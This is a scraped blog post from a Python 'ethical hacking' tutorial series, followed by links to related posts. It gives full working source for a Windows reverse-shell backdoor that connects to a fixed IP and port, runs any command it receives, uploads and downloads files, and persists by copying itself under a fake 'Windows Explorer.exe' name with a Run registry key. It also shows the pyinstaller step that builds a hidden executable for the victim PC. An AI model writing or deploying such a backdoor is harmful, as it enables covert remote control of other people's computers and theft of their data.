Polish the Python code by adding the become_persistent function.

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

import sys

import shutil

class Backdoor:

    def __init__(self, ip, port):

        self.become_persistent()

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def become_persistent(self):

        evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"

        if not os.path.exists(evil_file_location):

            shutil.copyfile(sys.executable, evil_file_location)

            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d "' + evil_file_location + '"', shell=True)

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        DEVNULL = open(os.devnull, "wb")

        return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            try:

                if command[0] == "exit":

                    self.connection.close()

                    sys.exit()

                elif command[0] == "cd" and len(command) > 1:

                    command_result = self.change_working_directory_to(command[1])

                elif command[0] == "upload":

                    command_result = self.write_file(command[1], command[2])

                elif command[0] == "download":

                    command_result = self.read_file(command[1]).decode()

                else:

                    command_result = self.execute_system_command(command).decode()

            except Exception:

                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)

try:

    my_backdoor = Backdoor("10.0.0.43", 4444)

    my_backdoor.run()

except Exception:

    sys.exit()

Convert to Windows executable file.

wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-/Scripts/pyinstaller.exe reverse_backdoor.py --onefile --noconsole

Execute the reverse_backdoor file on the victim Windows 10 PC.

Restarted the victim Windows PC and the communication established automatically.

Python Ethical Hacking - Persistence(2)的更多相关文章

  1. Python Ethical Hacking - Persistence(1)

    PRESISTENCE Persistence programs start when the system starts. Backdoors -> maintain our access. ...

  2. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  3. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  4. Python Ethical Hacking - Malware Analysis(1)

    WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...

  5. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  6. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

  7. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  8. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  9. Python Ethical Hacking - MAC Address & How to Change(2)

    FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...

随机推荐

  1. ca74a_c++__文件流对象的使用-用来读写文件ifstream

    /*ca74a_c++__文件流对象的使用-用来读写文件将文件流对象绑定到文件上检查文件是否打开成功将文件流与新文件重新绑定清楚文件流的状态infile.close();//关闭流 infile.cl ...

  2. vs2017离线包下载获取方法

    一.去官网下载所需要的版本的安装包获取程序: https://www.visualstudio.com/zh-hans/downloads/ 三个版本,对应文件名称为: 社区版:vs_Communit ...

  3. 容器技术之Docker Machine

    前文我们聊了下docker容器的资源限制,回顾请参考https://www.cnblogs.com/qiuhom-1874/p/13138725.html:今天我们来聊一聊docker machine ...

  4. oracle不足位数补零的实现sql语句

    select rpad('AAA',5,'0') from dual; 这样就可以了 [注意] 1.'AAA'为待补字符:5表示补齐后的总字符长度:0表示不足时补什么字符 2.rpad是右侧补0,左侧 ...

  5. 动力节点 mysql 郭鑫 34道经典的面试题二

    13.有3个表S(学生表),C(课程表),SC(学生选课表) S(SNO,SNAME)代表(学号,姓名) C(CNO,CNAME,CTEACHER)代表(课号,课名,教师) SC(SNO,CNO,SC ...

  6. 5、struct2使用登陆的时候重定向功能,如果没有登陆,重定向到登陆页面

    1.实现这样一份功能,列如用户在进行某些操作的时候,如果没有登陆重定向到登陆页面 首先:我们创建一个功能操作页面,用户准备在该页面执行某些操作 在index.jsp中 <%@ page lang ...

  7. 僵尸扫描-scapy、nmap

    如果不知道僵尸扫描是什么,请参考我的这篇博客 实验环境: kali(攻击者) 192.168.0.103 metasploitable2(目标主机) 192.168.0.104 win xp sp2( ...

  8. ASP.NET Core Blazor Webassembly 之 渐进式应用(PWA)

    Blazor支持渐进式应用开发也就是PWA.使用PWA模式可以使得web应用有原生应用般的体验. 什么是PWA PWA应用是指那些使用指定技术和标准模式来开发的web应用,这将同时赋予它们web应用和 ...

  9. C++的逗号运算符

    逗号运算符( , )是C++语言运算符中优先级最低的一种运算符,结合顺序是从左至右,用来顺序求值(最后一个逗号后面表达式的值作为整个表达式的值). 感觉这个东西还是挺冷门的,之前都不知道,平时也比较少 ...

  10. Redis系列(六):数据结构List双向链表LPUSH、LPOP、RPUSH、RPOP、LLEN命令

    1.介绍 redis中的list既实现了栈(先进后出)又实现了队列(先进先出) 1.示意图 2.各命令详解 LPUSH/RPUSH LPUSH: 从队列的左边入队一个或多个元素 将所有指定的值插入到存 ...